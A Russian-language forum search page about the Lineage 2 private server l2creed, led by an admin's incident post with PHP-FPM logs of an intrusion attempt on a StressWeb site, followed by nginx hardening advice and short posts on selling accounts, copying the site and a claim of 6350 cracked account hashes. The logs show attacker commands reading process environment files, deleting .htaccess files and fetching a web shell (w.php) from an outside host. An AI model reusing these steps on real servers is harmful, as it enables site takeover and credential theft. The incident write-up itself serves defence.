Поиск сообщества
Показаны результаты для 'l2creed' в темы.
Найдено: 119 результатов
-
Тема для ознакомления, наткнулся случайно в рунете Сылка на оф тему если кому то не удобно читать http://zone-mmo.ru/news/93-hack-uyazvimosti-stressweb.html Делать было нечего и решил я ненароком заглянуть в логи сервера, открыл самые старые и начал быстро пролистывать. Какого же было мое удивление когда я наткнулся на такие строки в отработчике fcgi Sep 15 22:15:46.551306 [WARNING] fpm_stdio_child_said(), line 167: child 18889 (pool default) said into stderr: "[sat Sep 15 22:15:46 2012] [warn-phpd] mmap cache can't open /home/site/www/public_WWW/application/../../../../../proc/31949/environ - Permission denied (pid 18889)" Sep 15 22:58:50.521598 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found" Sep 15 22:58:50.527109 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found" Sep 15 22:58:50.533681 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found" Sep 15 23:03:53.294177 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/cache/.htaccess': No such file or directory" Sep 15 23:03:53.299984 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "rm: " Sep 15 23:03:53.300113 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "cannot remove `/home/site/www/public_WWW/cache/.htaccess'" Sep 15 23:03:53.300183 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: ": No such file or directory" Sep 15 23:03:53.300221 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "" Sep 15 23:05:35.377689 [WARNING] fpm_stdio_child_said(), line 167: child 18888 (pool default) said into stderr: "rm: cannot remove `/home/site/www/forum.public_WWW/customavatars/index.html': Permission denied" Sep 15 23:06:44.788091 [WARNING] fpm_stdio_child_said(), line 167: child 18864 (pool default) said into stderr: "cat: /home/site/www/public_WWW/cache/.htaccess: No such file or directory" Sep 15 23:08:31.071273 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php" Sep 15 23:08:31.071371 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... " Sep 15 23:08:31.190293 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38" Sep 15 23:08:31.190390 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... " Sep 15 23:08:31.206526 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected." Sep 15 23:08:31.206628 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... " Sep 15 23:08:31.230703 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK" Sep 15 23:08:31.230881 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: 24885" Sep 15 23:08:31.230926 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K) [application/octet-stream]" Sep 15 23:08:31.231015 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied" Sep 15 23:08:31.231073 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "" Sep 15 23:08:31.231100 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)." Sep 15 23:08:31.237323 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php" Sep 15 23:08:31.237398 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... " Sep 15 23:08:31.239476 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38" Sep 15 23:08:31.239574 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... " Sep 15 23:08:31.260610 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected." Sep 15 23:08:31.260697 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... " Sep 15 23:08:31.278255 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK" Sep 15 23:08:31.278374 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: " Sep 15 23:08:31.278428 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "24885" Sep 15 23:08:31.278469 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K)" Sep 15 23:08:31.278507 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " [application/octet-stream]" Sep 15 23:08:31.278553 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied" Sep 15 23:08:31.278601 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "" Sep 15 23:08:31.278627 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)." Sep 15 23:08:31.285959 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php" Sep 15 23:08:31.286045 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... " Sep 15 23:08:31.288344 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38" Sep 15 23:08:31.288425 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... " Sep 15 23:08:31.365533 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected." Sep 15 23:08:31.365608 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... " Sep 15 23:08:31.388258 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK" Sep 15 23:08:31.388370 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: " Sep 15 23:08:31.388411 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "24885" Sep 15 23:08:31.388454 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K) [application/octet-stream]" Sep 15 23:08:31.388560 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied" Sep 15 23:08:31.388611 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "" Sep 15 23:08:31.388639 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)." Sep 15 23:11:49.034817 [WARNING] fpm_stdio_child_said(), line 167: child 18890 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/images/.htaccess': No such file or directory" Sep 15 23:11:49.040454 [WARNING] fpm_stdio_child_said(), line 167: child 18890 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/images/.htaccess': No such file or directory" Sep 15 23:12:34.902937 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/" Sep 15 23:12:34.903027 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory" Sep 15 23:12:34.910153 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/" Sep 15 23:12:34.910279 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory" Sep 15 23:12:34.917624 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/" Sep 15 23:12:34.917700 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory" Сопоставив все это с аксесс логом подведем следующие итоги дамы и господа StressWeb имеет уязвимость, а именно межсайтовый скриптинг. Залить шелл мне на хост в итоге не получилось по причине тонких настроек безопасности и нюансов в настройках NGINX Несколько полезных советов как обезопасить себя. Актуально если используется NGINX, апач я не рассматриваю Все папки в директории куда залит стрессвэб полжны иметь права 755 исключающие запись за исключением папки cache, для нее необходимы права 777 В конфиг хоста для ngix до передачи типа рнр на отработку добавляем: В конфиг хоста для ngix до передачи типа рнр на отработку добавляем: location ~* (config|admin|cache|account|application|dev)/.+\.php { deny all; } Правило запрещает обращаться к рнр файлам там где это не нужно а так же запрещает обращение к рнр файлам в директории cache если туда каким то волшебным образом прилетит рнр файлик. location ~* /templates/.+\.tpl { deny all; } Правило запрещает сливать ваши tpl файлы дизайна сайта. Правило запрещает сливать ваши tpl файлы дизайна сайта. А именно чтобы не получилось вот так - http:// l2creed. ru/templates/creed123/index.tpl а затем вот так - http:// forummaxi. ru/index.php?showtopic=20316 Далее как и в моем случае пароли на мускул с конфигов скорее всего могут быть слиты, для того, что бы они оказались бесполезны на геймсервере и вэюсервере порт на фаерволе 3306 должен быть открыт только для разрешенных айпи. Подробности настройки таблеса под гейм тут - http://forummaxi.ru/...ials&article=45 Касаемо подробностей стресса а дыра 100% там буду разбираться с утра на свежую голову. Могу лишь сказать одно, сервер не поимели благодаря этим настройкам. ps межсайтовый скриптинг это инклады и исполнение кода на вашей машине со сторонних адресов.
-
Продам шмот на сервере http://l2creed.ru/ (не реклама). -2 сета 3 лвл: Лайт/Роба +75 -Маг пуха(эмпавер) и молот 3лвл+75 -Тату мага/война +75 -Ожирелье власти, крид неклю, крид кольцо, крит серьгу и части рб бижи +75 -крыла, шлема -щит+75 ---------------------------------------------------------------------------------------------- Возможность покупки аккаунта: -вещи +все дополнительные скилы 1лвл -1.5к пвп на чаре -много с кем хорошие отношения Ваши предложения писать сюда, либо в лс. Ник в игре: HoHo
-
Никогда не продавал чаров , ибо это считаю нищеброд Экстрим стайлом =). Я оникс кормил напостой и не жалею об этом. Я вообше много севреров кормлю ибо особо заморачиватся не люблю с фармом , люблю расслабон.Для инфы La2onix.ru - 1 открытие Фулл Лучник +100, дон тату , хиро вечное. Дон ник Don Stop 2 открытие то же самое. La2onix.su - фулл овер +100 с таким же ником Ready-2Play.ru - фулл чар с дон крылом La2dead.ru - Дон крыло , все фулл La2Strong - В ноябре прошлого года фулл чар+ власти + фулл маг в придачу l2creed - фулл маг\лучник\танк , дон тату , шлем , дреды , фулл власти , краски +5 на всех профах , фулл скиллы за пвп на всех профах, куча реликвий, дон ник менялся 3 раза.
-
Вот скидываю сюда что на данный момент есть по бруту хэшэй сервера l2creed. 6350 расшифрованных аккаунтов из
-
l2creed (не реклама) ?
-
нужна копия l2creed.ru (не реклама) в минимальные сроки.Плачу 700грн. Куплю лишь после теста.Подробней в http://vk.com/d0c_95
-
в l2creed на всех вещах копирайты и 3д копирайты
-
ну вот к примеру копию l2creed.ru(не реклама) что бы сделать,сколько понадобится времени,и денег?я говорю за очень качественную копию,во сколько она обойдется?
-
l2creed больше не знаю)
-
l2creed.ru но он уже гг
-
у l2creed свой дп
-
L2creed- дп от мехико LikeaDeath - дп от мехико L2hot - дп от мехико
-
Кто может рипнуть под sw11 буду благодарен http://l2creed.ru/
-
Я смотрю что он чемто напоминает L2creed(не реклама)....
-
Всем привет кто нибудь сможет пожалуйста сделать такой-же Супер шопа как на l2creed.ru блин сильно понравилась)) За спасибку. Пожалуйста или же хоть иконки такие как там благодарен.
-
Окей , взломай мне ЛГ и мы можем говорить дальше. L2creed - LG + PW + SW все отлично пашет. И куда ты с ребелионом лезешь в ИТ ?
-
Ребята подскажите на какой сборке етот сервер l2creed.ru/ не ркулама!
-
Это типо шифровка L2creed'a?
-
l2creed.ru не реклама
-
http://l2creed.ru/
-
Ку всем рипните пожалуйста под SW 11 www.l2hot.ru( не реклама клянусь ) вот прям копия =))) или-же www.l2creed.ru ( не реклама клянусь ) ставлю 70 спасибок обещаю!
-
l2creed.ru(не реклама)
